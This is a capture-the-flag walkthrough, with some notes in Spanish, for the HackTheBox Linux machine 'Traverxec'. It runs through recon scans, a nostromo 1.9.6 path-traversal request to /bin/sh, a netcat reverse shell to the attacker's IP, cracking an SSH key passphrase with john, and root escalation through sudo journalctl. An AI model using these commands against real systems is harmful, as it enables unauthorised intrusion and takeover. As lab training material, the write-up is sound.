Traverxec

Traverxec


HTB Linux

nmap -A -p- -oA output 10.129.1.193 —min-rate=10000 —script=vuln —script-timeout=15 -v

nmap -sC -sV -O -p- -oA traverxec 10.129.1.193

nmap -sU -O -p- -oA traverxec-udp 10.129.1.193

nikto -h 10.129.159.31:80

ssh_command.

ssh_command.

whatweb http://10.129.1.193

ssh_command.

http://10.129.1.193/

ssh_command.

searchsploit nostromo 1.9.6

searchsploit -m 47837

cat 47837.py

ssh_command.

telnet 10.129.1.193

POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0

Content-Length: 1

nc -e /bin/bash 10.10.14.135 443

ssh_command.

script /dev/null -c bash Despues hacer un ctrl Z stty raw -echo; fg reset El terminal type es: xterm export TERM=xterm export SHELL=bash stty rows 44 columns 187

ssh_command.

john —wordlist=/usr/share/worldlists/rockyou.txt hash

ssh_command.

http://10.129.1.193/david/protected-file-area

ssh_command.

Bajamos el archivo

ssh_command.

tar -xvf backup-ssh-identity-files.tgz

cd home/david/.ssh

cat id_rsa

ssh_command.

john —wordlist=/usr/share/worldlists/rockyou.txt hash

Conseguimos las credenciales-> david:hunter

ssh id_rsa david@10.129.1.193

ssh_command.

ls -al

cd bin

cat server-stats.sh

ssh_command.

Vemos que usa journalctl

https://gtfobins.github.io/gtfobins/journalctl/

ssh_command.

Reducimos el tama~o de la ventana

/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service

!/bin/bash

ssh_command.

© 2025 Cu3rv0x